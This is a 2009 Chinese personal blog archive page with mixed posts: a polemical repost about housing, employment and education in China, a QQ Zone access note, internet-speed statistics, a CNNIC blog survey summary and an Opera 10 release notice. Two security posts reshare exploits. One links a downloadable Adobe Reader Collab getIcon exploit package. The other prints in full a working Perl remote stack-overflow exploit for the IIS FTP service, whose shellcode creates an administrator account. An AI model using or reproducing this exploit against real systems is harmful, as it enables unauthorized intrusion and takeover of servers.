中国人正在上的四个当

2009年9月7日 秋天
{ 19 条评论 }

      转载的一篇文章,作者态度略微有些偏激,但话题引人深思。
  第一大当:房产

  买房意味着什么?意味着你拥有了一个属于自己的房子。是的,你是这样以为,但是在中国你并无法拥有这个房子,只是租给你而已。因为房子是你的,地不是你的,只是把土地使用权70年(从现在退70年那是抗日战争时期,谁见过那时候的房子?)。房子通常情况下30年左右就会遇上拆迁或者旧房改造。也就是说你花了买房的钱,却只能得到租房的实际效果。当然这还不是最坏的。最坏的是,当几十年后你发觉上当了!有一群流氓冲进你用一辈子积蓄买下的房子,画上一个大大的拆字!然后把你的家当全部当垃圾一样的仍出门外,不顾你的苦苦哀求,甚至还在报纸上给你按一个钉子户的臭名,任大众辱骂的时候你就会知道什么叫做绝望!

  形容中国的房地产有一个很有名的笑话是这样写的:

  以前,有个地主有很多地,找了很多长工干活,地主给长工们盖了一批团结楼住着,一天,地主的谋士对地主说:东家,长工们这几年手上有点钱了,他们住你的房子,每月交租子,不划算,反正他们永远住下去,你干脆把房子卖给他们起个名堂叫做——公房出售!告诉他们房子永远归他们了,可以把他们这几年攒的钱收回来,地主说:不错,那租金怎么办?谋士说:照收不误,起个日本名儿,叫物业费!地主很快实行了,赚了好多钱,长工们那个高兴啊!

  过了几年,地主的村子发展成城镇了,有钱人越来越多,没地方住,谋士对地主说:东家,长工们这几年手上又有钱了,咱们给他们盖新房子,起个名堂叫做旧城改造,他们把手上的钱给我们,我们拆了房子盖新的,叫他们再买回去,可以多盖一些卖给别人,地主又实行了,这次,有些长工们不高兴了,地主的家丁派上用途了,长工们打掉牙只好往肚子里咽,地主又赚了好多钱。

  又过了几年,地主的村子发展成大城市了,有钱人更多了,地主的土地更值钱了,谋士对地主说:东家,咱们把这些长工的房子拆了,在这个地方建别墅,拆出来的地盖好房子卖给那些有钱的大款还能赚一笔,地主说:长工们不干怎么办?谋士说:咱给他们钱多点儿,起个名堂叫货币化安置,咱再到咱们的猪圈旁边建房子,起个名堂叫经济适用房,给他们修个马车道让他们到那边买房住,地主说:他们钱不够怎么办?谋士说:从咱家的钱庄借前给他们,一年6分利,咱这钱还能生钱崽,又没风险,地主又实行了,长工们拿到钱,地主的经济适用房到现在才建了一间,长工们只好排队等房子,直到现在,还等着呢……

  于是,长工们开始闹事了,地主有点慌,忙问谋士怎么办?谋士说:赶紧通知长工们,房子要跌价了,别买了,租房住吧,正好把我们的猪圈租给他们,结果,这么多年后,长工们的钱全没了,还在租房住,直到永远!

  这个笑话虽然有点夸张,但实际上这何尝又不是事实呢?有人说既然如此?为什么中国人还要买房?疯了一样的买?为什么?还不是愚民教育的结果,就好象60 年代,鼓吹人们必须购买三大件:手表、缝纫机、自行车才算是成功人士才可嫁人娶妻。70年代鼓吹人们必须购买新四大件:电视,冰箱,洗衣机,装电话才算是出人头地才可娶妻生子一样,记得当年装电话可是要几千块钱一部啊(人均收入不到200的小城),而北京上海更有上万一部的时候,还得排队买号搭人情,和今天的买房又何其相似?

  而今天所有的狗屁学者又开始了这一套愚弄百姓的旧招:白领一族新标准,成功人士新选择X环X路小户型,X环X路商住型。收了你几十万后,还得每个月收你租金(新物业费),银行利息,以及各种巧立名目的加息、政策等等等等。总之不怕你不被整死,就怕你死得不够惨!老百姓咋就怎么乐于上当,而且百上不厌呢?我真是气得浑身都湿了!

  第二大当:就业

  当有人终于开始感叹:当年当知青的时候,当有人下岗之后感到没有生路,只能静坐抗议却无人理会,只能沦落街头还被人编首歌嘲笑着人生豪迈,重头再来的时候。你可曾想过!他们也曾经和今天的白领一样风光!他们的收入和地位也曾经让周围的人艳羡不已?你可曾想过20年后的今天!你一样会和他们一样沦落街头,众叛亲离?!

  有人说嘿!你不知道有失业保险,养老保险,XX保险么?呵呵,我在北京漂泊N年,交了无数保险大概有好几万吧,但失业的时候跑断腿也没人给我啥保险,反而很多保险都被冻结了说我交得断断续续的,我简直又气得……这还不算,你以为你到了60岁真的就可以拿到养老保险了吗?天上又不会掉钱!今天的老年人拿的退休金是我们在挣!而今天30-40岁的人通常都有好几个兄弟姐妹!意思就是,今天的老年人能在60岁拿到养老保险是因为有5个人供一个老人!而我们这一代老去之后则是一个人供我们两个老人!钱从哪里来?没得来!您要是能活到90岁估计能领到一些养老保险,嘿保重吧您。然而即使是这样,家长们还是疯了一样的把孩子往各种企事业国有单位里送,我身边就经常有这样的例子。我老家一个远房亲戚,找关系拖朋友,花了七万块钱通过公开招聘把儿子送进了交警队,干上合同制的police。一个月拿800块。结果第三年被竞争上岗给刷下来了。一家人哭哭啼啼,我说刷了好,你上那班一辈子挣不回那七万,赶紧先洗洗睡,改明再凑点钱做小生意去吧!没准还能赚点。

  当年我毕业的时候,我不文明用语也是领着我抱着钱,把我往XX部送。我一看负责招工那人那德行,就忍不住的恶心,再一看薪水,不文明用语呀,我这不是白干10年不吃不喝才拿回成本。所以我私下威胁了那家伙一把,吓得那个大腹便便的X科长再也不敢招收我。我才得已:离家出走。

  我就想不明白?中国人咋就这么傻?这么迷信国字呢?醒醒吧,思维正常一点行不?做事之前自己算算合算不合算成不?

  还有那些年纪轻轻的小白领们,找工作最好把薪水要高点,别要医疗保险和啥保险,然后自己把钱存起来最保险,将来用得着。

  第三大当:教育

  一张文凭值多少钱?一张文凭值多少钱?一张文凭值多少钱?印刷成本两块钱顶了天了。一个老师工资多少?嘿,两个学生的学费足够一学期了!一个班的书本印刷多少钱?两个学生的足够了!一个班房租多少钱一学期?嘿嘿两个学生足够了。!嘿!中国教育你凭啥收那么多钱!?

  嘿!百姓们!我们为啥要上当?因为从小统治阶级就告诉我们考上秀才才光荣。哦对不起我说错了,是考上大学才光荣。但老百姓从来不去想一想为什么光荣?为什么光荣…… 大学秀才又怎样还不是废物!

  你知道你的孩子是什么人在教么?在中国一般是无法适应社会的人才会沦为一个教师,举个例子。前段时间我因为一个项目的关系,找了几个大学的硕士生做程序。结果有几个人笨得很,完全不给你考虑,非得你守着才干活,而且给

收藏与分享
随笔杂谈

QQ空间不能匿名访问–遭遇神兽河蟹

2009年9月7日 秋天
{ 16 条评论 }

      今天想匿名访问别人空间的,直接在地址栏输入xx.qzone.qq.com之后提示需要登录之后才能查看,心想见鬼了以前都能匿名访问的,今天怎么就不行了。到了qq空间的主页qzone.qq.com上发现还是一样需要登录。

QQ空间首页同样需要登录


被神兽河蟹死死钳住的QQ空间


一番网上猛搜发现QQ空间也遭遇河蟹了:

引用内容 引用内容

      互联网违法和不良信息举报中心根据公众举报并经核查,少数网站在前期曝光整改后,未能保持整改效果,再次出现大量违背社会公德、损害青少年身心健康的低俗内容,现予公布。
    1、“猫扑网”“贴贴”栏目的“美女贴图”版块存在大量低俗图片。
    2、“腾讯网”的“QQ空间”栏目中存在大量低俗内容。
    3、“天极网”“天极群乐”社区的“美女图片”版块存在大量低俗图片。
    4、“悟空搜索”WAP网站的“图片搜索”结果中存在大量低俗内容。
      这种藐视法律法规,违背社会公德的行为引起公众的愤慨,应受到强烈谴责。互联网违法和不良信息举报中心要求上述网站认真清理和整治低俗内容,欢迎公众继续监督举报。


      中国互联网协会互联网违法和不良信息举报中心

                                                 2009年6月20日


      再看马化腾们的公告:

引用内容 引用内容

      尊敬的QQ空间用户:

您好!
      感谢大家一直以来对QQ空间的喜爱和支持!
      随着QQ空间不断的更新及功能优化,QQ空间的用户群也在急速增长。
      在暑假到来之际,为了能提供更加优质的服务,QQ空间近期进行升级维护。
      维护过程中暂不支持访问非QQ好友的空间,大家可以尝试添加对方为QQ好友。
      为大家带来不便敬请愿谅解。谢谢!
                                                      QQ空间项目组


      从7月份开始“维护”一直维护到现在,估计是神兽河蟹的钳子还没松开吧。
      虽然不能网页匿名访问,但办法还是有的,只要空间没有加密而且已经升级到4.0宽屏(现在绝大部分都已经是了)就可以用RSS获取QQ空间日志更新,形如:
      http://feeds.qzone.qq.com/cgi-bin/cgi_rss_out?uin=QQ号码,把最后的"QQ号码"换成实际你想要获取更新的号码即可。

收藏与分享
随笔杂谈

全球网速排名揭晓,中国仅排71

2009年9月4日 秋天
{ 22 条评论 }

      据国外媒体报道,美国通讯业工人协会(Communications Workers of America)近日发布的网速调查报告显示,韩国互联网网速在全球居首位,平均传输速率达20。4兆位/秒;日本次之,为15。8兆位/秒;瑞典 12。8兆位/秒,排名第三。而中国则远远落后于其他先进国家,排在第71位,平均速率只有1。774兆位/秒。统计数据表明,韩国和日本是平均网速最快的地区。近年来,韩国和日本网络技术发展迅速,每年均保持20%以上的飞速增长。韩国去年投入1。3亿韩元建设百兆网络,并打算到2010年,实现1000万户居民通宽带,普及率近90%。

  中国大陆平均传输速率仅1.774兆位/秒,排在第71位。下载速度为2.37兆位/秒,上传速度为1.18兆位/秒。

  据测算,韩国的网速为中国的11.5倍,日本也几乎达到中国的9倍。

  此项调查邀请了41.3万名世界各地的互联网用户参加。调查中还发现,至少有18%的“宽带”业务,甚至不符合通信技术组织规定的下载速度要求。

  网速测试还显示,美国从2008年至2009年,互联网网速从4.2兆位/秒仅提高到5.1兆位/秒,在全球排名第28。在日本,人们上传一份高清视频文件仅用12分钟,而在美国需要两个半小时。

      在国外大力加大对通信线路、设备投入,给宽带扩容时,我们国内的通信服务商在忙什么呢?他们在忙怎样限制P2P软件,在忙一个家庭宽带账户只让连接一台电脑,除非你肯多给银子,以此来平衡网络负担。这些年国内的宽带用户增长速度是很快的,但我们的骨干网带宽增长速度却远远没有同步跟上。如果国内的电信巨头们仍然这样我行我素,本末倒置,那么相信在下一年的报告中我们的名次会继续保持"负增长"。

收藏与分享
IT网络资讯

Adobe Acrobat Reader Collab getIcon通杀漏洞

2009年9月4日 秋天
{ 13 条评论 }

      Adobe Acrobat Reader Collab getIcon通杀漏洞
      evil_pdf.py在以下系统测试通过:
Windows XP SP3 英文版/法文版
Windows 2003 SP2 英文版
      Adobe 应用程序版本:
Adobe Reader 9.0.0/8.1.2 英文版/法文版
      测试对象:
单独PDF文件、火狐FireFox3.0.13和IE7嵌入式PDF

#!/usr/bin/env python
#
# *** Acrobat Reader – Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 – Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip
back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

收藏与分享
网络安全

2008-2009中国博客市场及博客行为研究报告

2009年9月2日 秋天
{ 14 条评论 }

      闲来无事到CNNIC上逛了一圈,找到了一篇最新(6月份)的博客报告,特地贴出与诸君分享。
     2009年6月,中国互联网络信息中心(CNNIC)发布了《2008-2009博客市场及博客行为研究报告》。报告显示,截至2009年6月底,拥有个人博客或个人空间的用户规模已经达到1.81亿人,博客空间的规模已经超过三亿。报告表明,博客应用率在长期高速增长后趋于稳定,半年用户增长率为12%。博客活跃程度进一步提高,经常更新博客的用户比例为62.7%,活跃博客作者规模达到1.13亿。博客内容的更新受益于SNS氛围,获得了良好的成长性。由用户群体来看,我国博客表现出十分显著的年轻化特征,白领阶层的用户比例上升。

     本报告内容概要:

    1.博客网民用户规模和活跃程度持续上升

     2008年到2009年6月,博客用户规模持续快速发展。截至2009年6月底,用户规模已经达到1.82亿人,博客空间超过3亿;

     在博客数量持续攀高,用户聚集带来的规模效应,博客频道在各类型网站中成为标准配置和SNS氛围提升博客活跃程度的三重作用下,博客作者表达的积极性大幅提高,活跃博客数量呈现爆发式增长;

     随着博客的普及度越来越高,以及博客在SNS氛围中的良好成长性,博客将会在未来继续成为互联网应用的一个焦点。并将在移动终端的进一步普及和二三线城市的带动下延续高速增长的趋势。由于社会化网络的进一步发展,社区化的互动进一步加深,真实的身份信息是进一步建立真实关系的基础。

   2.网络对博客使用者渗透程度加深

     女性博客网民比例持续高出男性,博客在女性中的普及率要高于男性。这与博客本身的功能特性以及网民现实生活习惯有关;

     博客使用者体现了年轻化的特点,30岁及30岁以下的博客使用者占到总数的86.1%以上,中国博客的性别与年龄差异既是中国网络发展的特定阶段的特征,又与博客应用的特殊性相关;

     在博客使用者的收入调查中,与2007年相关数据相比,在2008年到2009年的博客使用者中,高收入人群出现小幅增长;

     博客网民的上网时间进一步增长,网络依赖程度进一步加深,网络已经渗透到大多数博客使用者的工作和生活当中;

     通过所阅读博客上的链接和搜索引擎去阅读的被调查者在四成以上,直接阅读网站推荐和朋友推荐也是博客读者获知博客的主要方式。博客依靠各种传播渠道传播的比例在2008年到2009年间均有增长。

   3.博客作者在参与公共事件时表现的更加积极主动

     比较2007年与2009年的调查结果可以看出,博客使用者的注册目的更加多元化,注册时表现的更为主动。博客作者在表述自我情感和发表言论方面表现的更为积极,博客用户在注册时表现的更为理智和目的明确,博客正在表现出强烈的社会化网络特征。

     博客作者的写作热情进一步提高。每天都更新的被访者占到19.7%,2008年奥运会等大事件的刺激,以及SNS氛围对博客作者短期内的更新频率起到了提升作用,博客作者的短期更新频率与2007年相比大幅增长;

     博客作者在表达观点时,选择发表针对“社会现象”的言论的博客作者达到了54.5%,与2007年相比增长了44.5个百分点,原因主要在于近一年来网络热点事件频发,博客作者通过个人言论参与公共事件的热情高涨,同时表达欲望得到张扬。与以往相比,中国的博客作者群体,越来越多地表现出理智成熟的一面;

     大多数博客作者认同网络世界与现实生活有着相同的道德价值观,认为博客作者发布在网上的言论,同样要受到现实生活中的道德与法律制度的规范;

     博客运营商提供的功能和服务已经基本满足了博客作者的客观需要,同时用户对于功能有了更为多元化的的要求;博客使用者对圈子和交友功能的需求已经接近于对一些基本功能的需求。

   4.现实世界对博客阅读者的影响加大

     现实社会对网络的渗透力不容忽视,访问朋友、同事的博客已经成为 "_blank">博客读者的主要阅读来源,这也从另一个方面说明了博客与社会化网络的紧密关系;

     博客阅读更为频繁,每周阅读博客的读者占到了读者总数的72.4%,在阅读时间上,阅读用时一小时之内的占到博客读者总数的绝大多数;

     随着SNS网站的兴起,一些SNS网站的博客数量也在呈现快速增长的势头,部分SNS网站在博客内容创生和用户粘度上都有不错的表现;

     在阅读博客来源及偏好的调查中,74.1%的被访者单选选择了“访问朋友、同事的博客”,是博客读者的主要阅读来源,博客与现实社会的关联度越来越紧密;

     在博客读者浏览的博客内容类别中,占到约半数的是娱乐类内容。心情记录、个人生活记叙的生活情感类占到了41.3%。这说明在博客阅读中多数浏览者关注博客主个人的自身属性。关注文化艺术历史类、体育运动类读者所占的比例较大,表示休闲娱乐仍是博客使用者的重要倾向。随着博客应用的发展,以及网民参与公共事件的热情高涨,关注社会类内容也成为阅读博客的一个新趋势;

     拥有强大品牌影响力的门户网站,以即时通信工具作为主要入口的的博客空间,蓬勃发展的SNS网站博客,成为读者阅读时的优先选择。

   5.博客使用者对博客实名制总体呈现积极正面态度

     在调查使用者认为的不良信息传播原因时,博客使用者认为博客运营方(BSP)是现在博客言论环境影响力的主导因素;

     有六成以上的使用者认为博客言论环境的改变依赖于博客发布者素质的提高,超过半数的使用者认为通过改善技术手段,保证身份认证信息安全可以促进博客言论环境改善。表现出使用者对于现在的互联网信息安全环境信任程度不够,对自身的身份信息安全存在一定的担心;

     目前博客博客实名制正确认知不足,政府或相关部门有必要在博客用户群体中进一步提高认知度,消除博客用户对实名制的误读;

     在听说过实名制的人群中,不反对实行有限实名制的使用者约占65.0%,中立观望态度的被访者占到21.7%,只有13.3%的被访者持反对态度;

     是否实行实名制对使用者是否继续注册博客影响不大,对实行博客实名制后继续注册持非消极态度的占八成以上。

      秋天一直以为写博客大多都是爷们的事,要么发表些技术文章;要么就是愤青们针砭下时弊;或者那种像那样的语言天才,思维如天马行空般开阔流畅的人针对任何事都能神侃一通。万万没想到博客在女性中比例比男性高,话说到现在真没见过几个独立女博客。另外一个感触就是现在很多博客能坚持勤更新的不多,个人Foxmail中订阅的博客RSS不下20个,其中已经有1/38月文章不足10篇,其中又有4个已经超过2个月未做任何更新。

      文末附上最新的国内互联网基础统计数据(截止2009-7-17):
      网民数量    3.38亿人    宽带网民数    3.2亿人
      网站数    306.1万个    国际出口带宽数    747541.4Mbps
      IPv4    2375万个    域名数    1626万个

收藏与分享
IT网络资讯

Opera10正式国际版隆重登场

2009年9月2日 秋天
{ 18 条评论 }

      经过近一年的测试,Opera 正式在 2009 年 9 月 1 日推出 Opera 10 浏览器国际中文版。在这个版本中,我们全新奉上浏览器涡轮加速 Opera Turbo 功能,宽带窄带全面提速。中国用户使用本土加速服务器,经过海缆异常的大客流考验依旧稳定。国际著名设计师 Jon Hicks 对 Opera 的外观进行了全新打造,Opera 10 国际中文版亦使用全球统一外观。全新的可视化标签和程序图标,可定制快速拨号项,Opera 基于原有创新,不断优化用户体验。无论您平时使用何种浏览器,Opera 10 都是值得收藏体验的不二之选。
      正式版终于摆脱了测试版的英文语言限制,安装程序包含国际语言包,安装时有中文可选。Build版本号仍为1750,但与Beta版1750不同,请注意。

Opera10 with Turbo


      Opera 10正式国际版Windows版下载地址
      Opera 10正式国际版Mac版下载地址
      Opera 10正式国际版Linux版下载地址

      附:
Opera 10 预告片:

Flash动画
在线播放


Opera 10 上手指南:

Flash动画
在线播放


Opera 10 最亮点 Turbo 功能简介:

Flash动画
在线播放


Opera 10 配套桌面壁纸下载:

Opera壁纸
收藏与分享
IT网络资讯 , ,

微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞

2009年9月1日 秋天
{ 11 条评论 }

      Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
      微软IIS5.0/6.0FTP服务远程堆栈溢出漏洞(win2k)

      现在用win2k跑IIS5.0/6.0的服务器估计不多了,2003是主流。
      这个漏洞代码的终极目的是在系统中建立一个以"winown"为用户名,"nwoniw"为密码的账户。
      此漏洞在Windows 2000 SP4上测试通过,影响带有堆栈cookie保护功能的IIS6程序。

复制内容到剪贴板程序代码程序代码

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]
收藏与分享
网络安全 ,
Page 20 of 87« First...101819202122304050...Last »